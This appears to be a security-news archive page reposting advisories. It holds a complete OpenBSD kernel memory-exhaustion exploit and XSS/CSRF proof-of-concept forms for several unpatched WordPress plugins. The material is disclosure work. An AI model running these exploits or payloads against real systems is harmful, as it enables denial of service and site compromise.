MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

31Aug/150

OpenBSD Local Denial Of Service

/*
 * 2015, Maxime Villard
 * Exploit triggering a memory leak in the OpenBSD kernel from an unprivileged
 * user. Found by The Brainy Code Scanner.
 */
 
- - - - - - - - - - - - - - - - - script.sh - - - - - - - - - - - - - - - - - -
 
#! /bin/sh
while true
do
  systrace -A ./exploit
done
 
- - - - - - - - - - - - - - - - - exploit.c - - - - - - - - - - - - - - - - - -
 
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
 
int main(int argc, char *argv[]) {
  execve("bin", argv, NULL);
}
 
- - - - - - - - - - - - - - - - - - bin.c - - - - - - - - - - - - - - - - - - -
 
int main() {}
 
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 
  $ gcc -o exploit exploit.c
  $ gcc -Wl,-dynamic-linker,/DEAD -o bin bin.c
  $ ./script.sh
 
Wait a bit, and the kernel will run out of memory.

(44)

31Aug/150

WordPress Advertisement Management 1.0 Cross Site Scripting

Title: WordPress 'Advertisement Management' Plugin 
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download: 
- https://wordpress.org/plugins/advertisement-management/
- https://plugins.svn.wordpress.org/advertisement-management/
Notified WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
Advertisement Management lets you administrate all the blog advertisements diretctly from the blog backend.
 
## XSS/CSRF vulnerabilities
==========================================================
The settings on the admin page is vulnerable to XSS.
 
PoC:
Log in as admin and submit the this form
 
<form method="POST" action="[URL]/wp-admin/options-general.php?page=Advertising_page&action=update"> 
   <input type="text" name="Advertising_front_page" value="</textarea><script>alert(1)</script>"><br />
   <input type="text" name="Advertising_single_top" value="</textarea><script>alert(2)</script>"><br />
   <input type="text" name="Advertising_single_bottom" value="</textarea><script>alert(3)</script>"><br />
   <input type="text" name="Advertising_page_top" value="</textarea><script>alert(4)</script>"><br />
   <input type="text" name="Advertising_page_bottom" value="</textarea><script>alert(5)</script>"><br />
   <input type="text" name="Advertising_below_commentbox" value="</textarea><script>alert(6)</script>"><br />
   <input type="text" name="Advertising_blog_top" value="</textarea><script>alert(7)</script>"><br />
   <input type="text" name="Advertising_below_footer" value="</textarea><script>alert(8)</script>"><br />
  <input type="submit">
</form>
 
After having done this, some of the injected scripts will be executed when loading the front page of the site.
 
## Solution
==========================================================
No fix available
 
==========================================================
XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

(22)

31Aug/150

WordPress arcResBookingWidget 1.0 Cross Site Scripting

Title: WordPress 'arcResBookingWidget' Plugin 
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download: 
- https://wordpress.org/plugins/arcres-booking-engine/
- https://plugins.svn.wordpress.org/arcres-booking-engine/
Notified Vendor/WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
Embeds the arcRes Booking Widget on a travel supplier website and ensures it is displayed for all arcRes-driven referrals.
 
## XSS/CSRF vulnerability
==========================================================
The iconmap admin setting is vulnerable to stored XSS and can be set using CSRF.
 
PoC:
Login as admin and submit the following form
 
<form method="POST" action="[URL]/wp-admin/options-general.php?page=arcRes-BookingWidget-options"> 
   <input type="text" name="formAction" value="Y"><br />
   <input type="text" name="arcRes_BookingWidget_option_iconmap" value='100000"><script>alert(1)</script>'><br />
   <input type="text" name="arcRes_BookingWidget_option_layout" value="vertical"><br />
   <input type="text" name="arcRes_BookingWidget_option_arcResReferralOnly" value="0"><br />
   <input type="text" name="arcRes_BookingWidget_option_cookieType" value="permanent"><br />
   <input type="text" name="Submit" value="Save Options"><br />
  <input type="submit">
</form>
 
 
## Solution
==========================================================
No fix available
 
==========================================================
XSS vulnerability found using Eir; an early stage static vulnerability scanner for PHP applications.

(22)

31Aug/150

WordPress Content Grabber 1.0 Cross Site Scripting

Title: WordPress 'Content Grabber' Plugin 
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-14
Download: 
- https://wordpress.org/plugins/content-grabber/
- https://plugins.svn.wordpress.org/content-grabber/
Notified WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
A plugin to help you grab content of any post type and display them as you want
 
## Vulnerabilities
==========================================================
Two POST parameters (obj_field_name and obj_field_id) are printed unsanitized when the 'get_terms_taxonomies' action is executed. 
 
PoC: 
 
Log in as admin and submit the following request:
 
<form method="POST" action="[URL]/wp-admin/admin-ajax.php"> 
   <input type="text" name="action" value="get_terms_taxonomies"><br />
  <input type="text" name="post_type" value="post" ><br />
  <input type="text" name="obj_field_name" value="widget-cg_content_grabber[3][cat_id]"><script>alert(1)</script>" ><br />
  <input type="text" name="obj_field_id" value="widget-cg_content_grabber-3-cat_id"><script>alert(2)</script>" ><br />
  <input type="text" name="cat_id_array" value="["1"]" ><br />
  <input type="submit">
</form>
 
## Solution
==========================================================
No fix available
 
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

(17)

31Aug/150

WordPress Default Facebook Thumbnails 0.4 Cross Site Scripting

Title: WordPress 'Default Facebook Thumbnails' Plugin 
Version: 0.4
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-13
Download: 
- https://wordpress.org/plugins/default-facebook-thumbnail/
- https://plugins.svn.wordpress.org/default-facebook-thumbnail/
Notified WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
This plugin adds a og:image tag to your head with the input/upload of the image in the settings.
 
## XSS/CSRF Vulnerabilities
==========================================================
The request URI is echo'ed into the HTML page without sanitization. This can be exploited with a direct link to the vulnerable file (keep in mind that most modern browsers encode the url).
 
PoC:
[URL]/wp-content/plugins/default-facebook-thumbnail/fb_thumbnail_admin.php?/"><script>alert(1)</script>
 
The "Upload Image or URL" field in the admin-settings page is vulnerable to stored XSS. This can be exploited by utilizing a CSRF vulnerability.
 
PoC:
Log in as admin and submit this form:
 
<form method="POST" action="http://[URL]/wp-admin/admin.php?page=fb_thumbs"> 
  <text>upload image: </text>
   <input type="text" name="upload_image" value=""><script>alert(1)</script>"><br />
   <text>fb_thumb_hidden: </text>
  <input type="text" name="fb_thumb_hidden" value="Y" readonly><br />
  <input type="submit">
</form>
 
 
## Solution
==========================================================
No fix available
 
==========================================================
XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

(51)

31Aug/150

WordPress Chief Editor 3.6.1 Cross Site Scripting

Title: WordPress 'Chief Editor' Plugin 
Version: 3.6.1
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-17
Download: 
- https://wordpress.org/plugins/chief-editor/
- https://plugins.svn.wordpress.org/chief-editor/
Notified Vendor/WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
Helps wordpress multisite "chief editor" to manage all drafts, comments, authors and "ready for publication" sends across the netw
 
## Vulnerabilities
==========================================================
Some POST parameters are printed directly to the HTML without being sanitized. 
 
PoC:
Log in as admin and submit the following form:
 
<form method="POST" action="[URL]/wp422/wp-admin/admin.php?page=chief-editor-dashboard"> 
  <input type="text" name="submitDate" value="someValue"><br />
  <input type="text" name="datepicker" value=""/><script>alert(1)</script>"><br />
  <input type="text" name="blog_id" value=""/><script>alert(2)</script>"><br />
  <input type="text" name="post_id" value=""/><script>alert(3)</script>"><br />
  <input type="submit">
</form>
 
 
## Solution
==========================================================
No fix available
 
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

(17)

31Aug/150

WordPress 1-Click Retweet/Share/Like 5.2 Cross Site Scripting

Title: WordPress '1-click Retweet/Share/Like' Plugin 
Version: 5.2
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-21
Download: 
- https://wordpress.org/plugins/1-click-retweetsharelike/
- https://plugins.svn.wordpress.org/1-click-retweetsharelike/
Notified Vendor/WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
Adds Facebook Like, Facebook Share, Twitter, Google +1, LinkedIn Share, Facebook Recommendations. Automatic publishing of content to 20+ Social Networ
 
## Vulnerabilities
==========================================================
The plugin is vulnerable to reflected XSS.
 
PoC:
Submit the following request (no need to login first..)
<form method="POST" action="[URL]/wp-login.php"> 
   <input type="text" name="lacandsnw_networkpub_key" value=""><script>alert(1)</script>"><br />
  <input type="submit">
</form>
 
 
## Solution
==========================================================
No fix available
 
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

(16)

31Aug/150

WordPress Author Manager 1.0 Cross Site Scripting

Title: WordPress 'Author Manager' Plugin 
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download: 
- https://wordpress.org/plugins/author-manager/
- https://plugins.svn.wordpress.org/author-manager/
Notified Vendor/WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
Author Manager is a must-have for administrators of a multiple-author WordPress site. Easily view post statistics by date.
 
## Vulnerabilities
==========================================================
Some of the fields in the admin panel is vulnerable to XSS.
 
PoC:
Log in as admin and submit the following form:
 
<form method="POST" action="[URL]/wp-admin/users.php?page=author-manager%2Fauthor_manager.php"> 
   <input type="text" name="am-filter-type" value="am-date-filter" readonly><br />
   <input type="text" name="am-start-date" value="'><script>alert(1)</script>"><br />
   <input type="text" name="am-end-date" value="'><script>alert(2)</script>"><br />
  <input type="submit">
</form>
 
## Solution
==========================================================
No fix available
 
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

(16)

31Aug/150

WordPress Ads In Bottom Right 1.0 Cross Site Scripting

Title: WordPress 'Ads in bottom right' Plugin 
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download: 
- https://wordpress.org/plugins/ads-in-bottom-right/
- https://plugins.svn.wordpress.org/ads-in-bottom-right/
Notified Vendor/WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
This plugin allow you show advertising in bottom right, you can put images, flash or any html code which you want.
 
## Vulnerabilities
==========================================================
Plugin settings vulnerable to XSS attacks.
 
PoC:
Log in as admin and submit the following form:
 
<form method="POST" action="[URL]/wp-admin/options-general.php?page=ads-in-bottom-right.php"> 
   <input type="text" name="status_submit" value="2"><br />
   <input type="text" name="ads_title" value='"><script>alert(1)</script>'><br />
  <input type="text" name="html_code" value="</textarea><script>alert(2)</script>"><br />
  <input type="text" name="submit" value="Save setting"><br />
 
  <input type="submit">
</form>
 
After doing this the injected script will also be executed when loading the main page. 
 
 
## Solution
==========================================================
No fix available
 
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

(15)

31Aug/150

WordPress Google Plus One Button By KMS 1.5.0 CSRF / XSS

Title: WordPress 'Google 'Plus one' Button by kms' Plugin 
Version: 1.5.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-16
Download: 
- https://wordpress.org/plugins/google-plus-one-button-by-kms/
- https://plugins.svn.wordpress.org/google-plus-one-button-by-kms/
Notified WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
WordPress bővítmény a Google +1 (plus one) gomb elhelyezésére. Megjeleníthető bejegyzés előtt, után, illetve az írások mellett bal oldalon
 
## CSRF/XSS vulnerabilities
==========================================================
The _SERVER variable 'REQUEST_URI' is printed directly into the HTML on the admin page. 
 
The settings in the admin panel is vulnerable to stored XSS and the settings can be changed using an CSRF attack.
 
PoC(s):
Log in as admin and submit one of the following forms:
 
XSS on admin pages:
<form method="POST" action="[URL]/wp-admin/options-general.php?page=google-plus-one-share-button"> 
   <input type="text" name="button_size" value="</script><script>alert(1)</script>"><br />
  <input type="text" name="button_location" value="</script><script>alert(2)</script>"><br />
   <input type="text" name="top_space" value="</script><script>alert(3)</script>"><br />
   <input type="text" name="left_space" value="</script><script>alert(4)</script>"><br />
   <input type="text" name="position" value="</script><script>alert(5)</script>"><br />
   <input type="text" name="filter_tag" value="</script><script>alert(6)</script>"><br />
   <input type="text" name="rp_gpo_submit" value="true" readonly><br />
  <input type="submit">
</form>
 
<form method="POST" action="[URL]/wp-admin/options-general.php?page=google-plus-one-share-button"> 
   <input type="text" name="button_size" value="</script><script>alert(1)</script>"><br />
  <input type="text" name="button_location" value="</script><script>alert(2)</script>"><br />
   <input type="text" name="top_space" value="</script><script>alert(3)</script>"><br />
   <input type="text" name="left_space" value="</script><script>alert(4)</script>"><br />
   <input type="text" name="position" value="</script><script>alert(5)</script>"><br />
   <input type="text" name="filter_tag" value="</script><script>alert(6)</script>"><br />
   <input type="text" name="rp_gpo_submit" value="true" readonly><br />
  <input type="submit">
</form>
 
XSS on pages displaying a Google Plus +1 button:
<form method="POST" action="[URL]/wp-admin/options-general.php?page=google-plus-one-share-button"> 
   <input type="text" name="button_size" value=""><br />
  <input type="text" name="button_location" value="left" readonly><br />
   <input type="text" name="top_space" value="asdf;}</style><script>alert(3)</script>"><br />
   <input type="text" name="left_space" value="asdf;}</style><script>alert(4)</script>"><br />
   <input type="text" name="position" value="asdf;}</style><script>alert(5)</script>"><br />
   <input type="text" name="filter_tag" value=""><br />
   <input type="text" name="rp_gpo_submit" value="true" readonly><br />
  <input type="submit">
</form>
 
<form method="POST" action="[URL]/wp-admin/options-general.php?page=google-plus-one-share-button"> 
   <input type="text" name="button_size" value=""/><script>alert(1)</script>"><br />
  <input type="text" name="button_location" value="top" readonly><br />
   <input type="text" name="rp_gpo_submit" value="true" readonly><br />
  <input type="submit">
</form>
 
## Solution
==========================================================
No fix available
 
==========================================================
XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.

(14)